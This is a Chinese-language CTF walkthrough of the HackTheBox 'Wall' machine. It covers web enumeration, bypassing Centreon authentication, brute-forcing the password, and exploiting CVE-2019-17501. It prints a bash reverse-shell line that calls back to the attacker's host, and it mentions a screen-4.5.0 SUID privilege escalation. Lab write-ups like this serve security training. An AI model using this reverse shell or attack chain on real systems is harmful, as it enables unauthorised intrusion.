大家好,今天给大家带来的CTF挑战靶机是来自hackthebox的“Wall”,hackthebox是一个非常不错的在线实验平台,能帮助你提升渗透测试技能和黑盒测试技能,平台上有很多靶机,从易到难,各个级别的靶机都有。本级靶机难度为简单级别,任务是找到靶机上的user.txt和root.txt。
masscan扫描开放端口
nmap探测22,80端口的服务信息,发现被过滤了
利用gobuster扫描web
->gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.157
->/.hta (Status: 403)
->/.htpasswd (Status: 403)
->/.htaccess (Status: 403)
->/index.html (Status: 200)
->/monitoring (Status: 401)
->/server-status (Status: 403)
只有monitoring有点用,不过monitoring需要认证才能登录发现只要把访问方式改为POST就能绕过认证进去发现这是一个centreon系统(Centreon是一个网络,系统,应用程序监督和监视工具)登陆处有一个csrf令牌验证,每次访问都会更改
在官网中得知,我们访问/api/index.php?action=authenticate,并且提供登录登录信息,将可以绕过令牌校验,从而达到爆破目的
我们使用Seclist字典进行爆破密码为 password1
我们发现了系统版本为19.04.0
该系统存在CVE-2019-13024漏洞,不过当我使用poc尝试攻击时,发现poc用不了,payload有一个过滤处响应403 后来我发现了CVE-2019-17501,这个要简单一点在http://10.10.10.157/centreon/main.php?p=60807&o=a&type=4中写入bash并用SimpleHTTPServer上传自己的webshellwebshell如下
->#!/bin/bash
->bash -i >& /dev/tcp/10.10.xx.xx/xxxx 0>&1
再次写入bash命令获得反向连接shell
->bash /tmp/n00b.sh
并且获得TTY终端
在使用自动化脚本枚举系统信息中发现系统中有一个不常见的suid二进制文件:
/bin/screen-4.5.0
使用poc获得root权限
最后我们得到了user.txt、root.txt
手握日月摘星辰,安全路上永不止步。
- Khan攻防安全实验室
扫码关注腾讯云开发者
领取腾讯云代金券
Copyright © 2013 - 2025 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 深公网安备号 44030502008569
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号 | 京公网安备号11010802020287
Copyright © 2013 - 2025 Tencent Cloud.
All Rights Reserved. 腾讯云 版权所有